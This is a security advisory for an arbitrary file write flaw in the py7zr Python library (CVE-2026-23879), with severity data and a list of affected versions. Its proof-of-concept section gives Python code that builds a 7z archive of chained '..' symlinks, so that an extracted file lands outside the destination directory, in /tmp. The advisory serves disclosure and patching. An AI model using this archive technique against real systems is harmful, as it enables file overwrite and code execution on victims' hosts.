GHSA-q6rc-2cgv-63h7

Suggest an improvement
Source
https://github.com/advisories/GHSA-q6rc-2cgv-63h7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-q6rc-2cgv-63h7/GHSA-q6rc-2cgv-63h7.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-q6rc-2cgv-63h7
Aliases
  • CVE-2026-23879
Published
2026-06-19T19:21:57Z
Modified
2026-06-19T19:30:16.494063473Z
Severity
  • 8.0 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
py7zr: Arbitrary File Write Vulnerability
Details

Summary

There exists an arbitrary file write vulnerability in py7zr (1.1.0, latest), which allows symbolic links to be recreated outside the destination directory via crafted malicious symbolic link chains. When using extractall to extract an archive, the library restores these symbolic links, linking them to arbitrary directories on the host file system. Subsequent extraction of regular files through these symbolic links can result in arbitrary file writes. This vulnerability may lead to remote code execution, privilege escalation, data corruption, or denial of service.

Details

The root cause of this vulnerability is that py7zr fails to properly restrict the targets of symbolic links within an archive. During extraction, the program only checks the link arcname within the destination directory, but ignores the combined symlink path resolution. Attackers can exploit this vulnerability by constructing malicious archives, thereby bypassing the directory boundary restrictions implemented by the extractor.

<img width="1806" height="834" alt="image" src="https://github.com/user-attachments/assets/cdd27ddb-ba79-4b20-b8b9-21f3e16a6e8b" />

PoC

Construct PoC Archive File

The following pseudo-code illustrates the vulnerable logic.

def create_sevenz_exp(output_dir: str):
    filename = "archive.7z"
    file_path = output_dir + filename
    with py7zr.SevenZipFile(file_path, 'w') as archive:
        archive.writestr("Some Text", "dir0/someFile.txt")
        add_symlink(archive, "dir1", "dir0/..")
        add_symlink(archive, "dir2", "dir1/..")
        add_symlink(archive, "dir3", "dir2/..")
        add_symlink(archive, "dir4", "dir3/..")
        add_symlink(archive, "dir5", "dir4/..")
        add_symlink(archive, "dir6", "dir5/..")
        add_symlink(archive, "dir7", "dir6/..")
        add_symlink(archive, "dir8", "dir7/..")
        add_symlink(archive, "myTmp", "dir8/tmp")
        archive.writestr("Malicious Text\n", "myTmp/poc.txt")

Unpack the archive

Use common decompression methods, then extract the archive.

import sys
import os
import py7zr

def extract_7z(seven_path, output_dir):
    os.makedirs(output_dir, exist_ok=True)
    with py7zr.SevenZipFile(seven_path, mode='r') as z:
        z.extractall(path=output_dir)
    print(f"Extracted '{seven_path}' to '{output_dir}'")

if __name__ == "__main__":
    seven_file = sys.argv[1]
    base_name = os.path.splitext(os.path.basename(seven_file))[0]
    output = base_name + "_sevenz_output"

    extract_7z(seven_file, output)

Impact

<img width="1268" height="572" alt="image" src="https://github.com/user-attachments/assets/919b5ff6-97ba-4781-b3e4-e9c9cc0f229b" />

After decompression, the output directory contains a sequence of symbolic links, which can finally point to the system root directory. Then, when extracting a regular file, the file will be written to an arbitrary path.

Database specific 
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-19T19:21:57Z",
    "nvd_published_at": null,
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-59"
    ]
}
References

Affected packages

PyPI / py7zr

Package

Name
py7zr
View open source insights on deps.dev
Purl
pkg:pypi/py7zr

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.1.3

Affected versions

0.*
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.2.0
0.3
0.3.1
0.3.2
0.3.3
0.3.4
0.3.5
0.4a1
0.4a2
0.4b1
0.4
0.4.1
0.4.3
0.4.4
0.5a3
0.5a4
0.5b1
0.5b2
0.5b3
0.5b4
0.5b5
0.5b6
0.5rc2
0.5rc3
0.5
0.5.2
0.5.3
0.5.4
0.5.5
0.6a1
0.6a2
0.6b1
0.6b2
0.6b3
0.6b4
0.6b5
0.6b6
0.6b7
0.6b8
0.6rc0
0.6
0.7.0b1
0.7.0b2
0.7.0b3
0.7.0
0.7.1
0.7.2
0.7.3
0.7.4
0.8.0a1
0.8.0a2
0.8.0a3
0.8.0b1
0.8.0b2
0.8.0b3
0.8.0b4
0.8.0b5
0.8.0b6
0.8.0b7
0.8.0b8
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.9.0a1
0.9.0a2
0.9.0b1
0.9.0b2
0.9.0b3
0.9.0
0.9.1
0.9.2
0.9.3
0.9.4
0.9.5
0.9.7
0.9.8
0.9.9
0.9.10
0.10.0a1
0.10.0a2
0.10.0a3
0.10.0a4
0.10.0a5
0.10.0a6
0.10.0b1
0.10.0b3
0.10.0
0.10.1
0.10.2
0.11.0a1
0.11.0b1
0.11.0b2
0.11.0b3
0.11.0
0.11.1
0.11.2
0.11.3
0.12.0
0.13.0
0.13.1
0.14.0
0.14.1
0.15.0
0.15.1
0.15.2
0.16.0
0.16.1
0.16.2
0.16.3
0.16.4
0.17.0
0.17.1
0.17.2
0.17.3
0.17.4
0.18.0
0.18.1
0.18.3
0.18.4
0.18.5
0.18.6
0.18.7
0.18.9
0.18.10
0.18.11
0.18.12
0.19.0
0.19.1
0.19.2
0.20.0
0.20.1
0.20.2
0.20.4
0.20.5
0.20.6
0.20.7
0.20.8
0.21.0
0.21.1
0.22.0
1.*
1.0.0rc1
1.0.0rc2
1.0.0rc3
1.0.0
1.1.0rc2
1.1.0rc4
1.1.0
1.1.2

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-q6rc-2cgv-63h7/GHSA-q6rc-2cgv-63h7.json"
last_known_affected_version_range 
"<= 1.1.2"